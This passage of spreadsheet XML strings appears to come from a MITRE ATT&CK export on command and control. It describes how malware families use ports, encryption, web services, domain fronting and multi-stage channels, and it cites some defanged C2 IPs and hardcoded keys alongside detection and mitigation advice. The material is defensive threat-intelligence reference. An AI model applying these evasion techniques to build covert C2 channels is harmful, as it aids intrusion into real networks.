    <t>[[Software/S0079|MobileOrder]] communicates with its C2 server over TCP port 3728.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Software: LOWBALL</t>
  </si>
  <si>
    <t>[[Software/S0042|LOWBALL]] command and control occurs via HTTPS over port 443.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>A [[Software/S0125|Remsec]] module has a default C2 port of 13000.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]]'s network loader encrypts C2 traffic with RSA and RC6.[[CiteRef::Symantec Remsec IOCs]]</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.[[CiteRef::SANS Decrypting SSL]] SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.[[CiteRef::SEI SSL Inspection Risks]]
If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[CiteRef::Fidelis DarkComet]]
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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1032</t>
  </si>
  <si>
    <t>Suckfly</t>
  </si>
  <si>
    <t>Suckfly ,</t>
  </si>
  <si>
    <t>G0039</t>
  </si>
  <si>
    <t>Software: Nidiran, Backdoor.Nidiran</t>
  </si>
  <si>
    <t>[[Software/S0118|Nidiran]] uses RC4 to encrypt C2 traffic.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>Taidoor ,</t>
  </si>
  <si>
    <t>G0015</t>
  </si>
  <si>
    <t>[[Group/G0015|Taidoor]] uses RC4 to encrypt the message body of HTTP content.[[CiteRef::TrendMicro Taidoor]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] uses AES to encrypt C2 communications.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Software: Felismus</t>
  </si>
  <si>
    <t>Some  samples use AES to encrypt C2 traffic.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware encrypts C2 traffic using RC4 with a hard-coded key.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>One [[Software/S0070|HTTPBrowser]] variant connected to its C2 server over port 8080.[[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1043</t>
  </si>
  <si>
    <t>A variant of [[Software/S0045|ADVSTORESHELL]] attempts communication to the C2 server over HTTP on port 443.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Software: PowerDuke</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] connects over 443 for C2.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0003|RIPTIDE]] is a RAT that communicates with HTTP.[[CiteRef::Moran 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0064|ELMER]] uses HTTP over port 443 for command and control.[[CiteRef::FireEye EPS Awakens Part 2]]</t>
  </si>
  <si>
    <t>Software: ChChes, Scorpion, HAYMAKER</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] can encrypt C2 traffic with AES.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::JPCERT ChChes Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] encrypts C2 traffic with RC4 using a secret key of 88888888.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0012|PoisonIvy]] uses the Camellia cipher to encrypt communications.[[CiteRef::FireEye Poison Ivy]]</t>
  </si>
  <si>
    <t>Lotus Blossom</t>
  </si>
  <si>
    <t>Lotus Blossom Spring Dragon ,</t>
  </si>
  <si>
    <t>G0030</t>
  </si>
  <si>
    <t>Software: Elise, BKDR_ESILE, Page</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] encrypts exfiltrated data with RC4.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>Software: SNUGRIDE</t>
  </si>
  <si>
    <t>[[Software/S0159|SNUGRIDE]] encrypts C2 traffic using AES with a static key.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>Putter Panda</t>
  </si>
  <si>
    <t>Putter Panda APT2 MSUpdater ,</t>
  </si>
  <si>
    <t>G0024</t>
  </si>
  <si>
    <t>Software: 3PARA RAT</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&amp;%9&amp;jkMCXuiS.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Software: CallMe</t>
  </si>
  <si>
    <t>[[Software/S0077|CallMe]] uses AES to encrypt C2 traffic.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Some variants of [[Software/S0076|FakeM]] use RC4 to encrypt C2 traffic.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] encrypts data sent to its C2 server over HTTP with RC4.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] uses port 8080 for C2.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] uses a specific port of 443 and can also use ports 53 and 80 for C2.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] has beaconed to its C2 over port 443.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>has communicated to its C2 server over port 8080.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>Some [[Group/G0032|Lazarus Group]] malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes commonly used ports such as 443, 53, 80, 25, and 8080.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has communicated with C2 servers over port 6667 (for IRC) and port 8080.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>C2 traffic for most [[Group/G0027|Threat Group-3390]] tools occurs over ports 53, 80, and 443.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: FTP, ftp.exe</t>
  </si>
  <si>
    <t>[[Software/S0095|FTP]] operates over ports 21 and 20.[[CiteRef::Wikipedia FTP]]</t>
  </si>
  <si>
    <t>[[Software/S0118|Nidiran]] communicates with its C2 domain over ports 443 and 8443.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>Axiom</t>
  </si>
  <si>
    <t>Axiom Group 72 ,</t>
  </si>
  <si>
    <t>G0001</t>
  </si>
  <si>
    <t>Software: Derusbi</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] beacons to destination port 443.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] uses a custom command and control protocol that communicates over commonly used ports.  The C2 protocol is encapsulated in common application layer protocols.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Deep Panda</t>
  </si>
  <si>
    <t>Deep Panda Shell Crew WebMasters KungFu Kittens PinkPanther Black Vine ,</t>
  </si>
  <si>
    <t>G0009</t>
  </si>
  <si>
    <t>Software: Mivast</t>
  </si>
  <si>
    <t>[[Software/S0080|Mivast]] communicates over port 80 for C2.[[CiteRef::Symantec Backdoor.Mivast]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] uses commonly used ports (like HTTPS/443) for command and control. [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>Software: Mis-Type</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] communicates over common ports such as TCP 80, 443, and 25.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Software: Misdat</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] network traffic communicates over common ports like 80, 443, or 1433.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>Software: S-Type</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] uses ports 80, 443, and 8080 for C2.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] established encrypted connections over port 443.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] uses Pastebin to store its real C2 addresses.[[CiteRef::Palo Alto PlugX June 2017]]</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1102</t>
  </si>
  <si>
    <t>[[Software/S0052|OnionDuke]] uses Twitter as a backup C2 method. It also has a module designed to post messages to the Russian VKontakte social media site.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Group/G0008|Carbanak]] has used a VBScript named "ggldr" that uses Google Apps Script, Sheets, and Forms services for C2.[[CiteRef::Forcepoint Carbanak Google C2]]</t>
  </si>
  <si>
    <t>One variant of [[Software/S0054|CloudDuke]] uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Software/S0046|CozyCar]] uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>Some [[Software/S0051|MiniDuke]] components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.[[CiteRef::F-Secure The Dukes]][[CiteRef::Securelist MiniDuke Feb 2013]]</t>
  </si>
  <si>
    <t>The "tDiscoverer" variant of [[Software/S0037|HAMMERTOSS]] establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. [[Software/S0037|HAMMERTOSS]] binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware can use a SOAP Web service to communicate with its C2 server.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>APT17</t>
  </si>
  <si>
    <t>APT17 Deputy Dog ,</t>
  </si>
  <si>
    <t>G0025</t>
  </si>
  <si>
    <t>Software: BLACKCOFFEE</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] uses Microsoft?s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims? machines.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from [[Discovery]] of the system and network information or [[Lateral Movement]] to the originating process may also yield useful data. ,</t>
  </si>
  <si>
    <t>Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1104</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Group/G0048|RTM]] has used an RSS feed on Livejournal to update a list of encrypted C2 server names.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.[[CiteRef::Securelist Dropping Elephant]]</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] uses Microsoft?s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Software: WINDSHIELD</t>
  </si>
  <si>
    <t>[[Software/S0155|WINDSHIELD]] C2 traffic can communicate via TCP raw sockets.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems.
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware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C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1095</t>
  </si>
  <si>
    <t>Software: PHOREAL</t>
  </si>
  <si>
    <t>[[Software/S0158|PHOREAL]] communicates via ICMP for C2.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] binds to a raw socket on a random source port between 31800 and 31900 for C2.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader establishes SOCKS5 connections for its initial C2.[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Software/S0043|BUBBLEWRAP]] can communicate using SOCKS.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>If [[Software/S0034|NETEAGLE]] does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, [[Software/S0034|NETEAGLE]] will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can be configured to use raw TCP or UDP for command and control.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0042|LOWBALL]] uses the Dropbox cloud storage service for command and control.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>Software: GLOOXMAIL, Trojan.GTALK</t>
  </si>
  <si>
    <t>[[Software/S0026|GLOOXMAIL]] communicates to servers operated by Google using the Jabber/XMPP protocol.[[CiteRef::Mandiant APT1]][[CiteRef::CyberESI GTALK]]</t>
  </si>
  <si>
    <t>Software: CALENDAR</t>
  </si>
  <si>
    <t>The [[Software/S0025|CALENDAR]] malware communicates through the use of events in Google Calendar.[[CiteRef::Mandiant APT1 Appendix]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] network traffic can communicate over a raw socket.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] network traffic communicates over a raw socket.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] is capable of using ICMP, TCP, and UDP for C2.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Responses from the [[Software/S0124|Pisloader]] C2 server are base32-encoded.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process Monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware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C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1132</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol. 
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are 
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</t>
  </si>
  <si>
    <t>Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic.
Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1008</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1001</t>
  </si>
  <si>
    <t>Multiband Communication</t>
  </si>
  <si>
    <t>Some adversaries may split communications between different protocols.  There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions.  The split could also be random to simply avoid data threshold alerts on any one communication.</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</si>
  <si>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used.[[CiteRef::University of Birmingham C2]] Correlating alerts between multiple communication channels can further help identify command-and-control behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1026</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.
Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.
Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[CiteRef::Fidelis DarkComet]]
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when communications do not follow the expected protocol behavior for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1024</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses [[Technique/T1032|Standard Cryptographic Protocol]], SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels.[[CiteRef::SANS Decrypting SSL]] SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.[[CiteRef::SEI SSL Inspection Risks]] After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.
With [[Technique/T1024|Custom Cryptographic Protocol]], if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.[[CiteRef::Fidelis DarkComet]]
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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1079</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [[Technique/T1008|Fallback Channels]] in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
Popular websites and social media can act as a mechanism for command and control and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t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.[[CiteRef::Fifield Blocking Resistent Communication through domain fronting 2015]] The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>If SSL inspection is in place, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names.[[CiteRef::Fifield Blocking Resistent Communication through domain fronting 2015]] ,</t>
  </si>
  <si>
    <t>If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.
In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems.[[CiteRef::FireEye APT29 Domain Fronting With TOR March 2017]][[CiteRef::Mandiant No Easy Breach]] It may be possible to detect or prevent the installation of these tools with Host-based solutions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1172</t>
  </si>
  <si>
    <t>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,  MIME, UTF-8, or other binary-to-text and character encoding systems.[[CiteRef::Wikipedia Binary-to-text Encoding]][[CiteRef::Wikipedia Character Encoding]] Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [[Technique/T1091|Replication Through Removable Media]]. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted. ,</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if they are not required for business operations.[[CiteRef::TechNet Removable Media Control]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1092</t>
  </si>
  <si>
    <t>Connection Proxy</t>
  </si>
  <si>
    <t>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [[Software/S0040|HTRAN]], ZXProxy, and ZXPortMap.[[CiteRef::Trend Micro APT Attack Tools]]
The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>Walker Johnson</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1090</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[[CiteRef::Wikipedia OSI]] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP).
ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;[[CiteRef::Microsoft ICMP]] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of using existing [[Technique/T1071|Standard Application Layer Protocol]] to encapsulate commands. Implementations could mimic well-known protocols.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1094</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Software: Tor</t>
  </si>
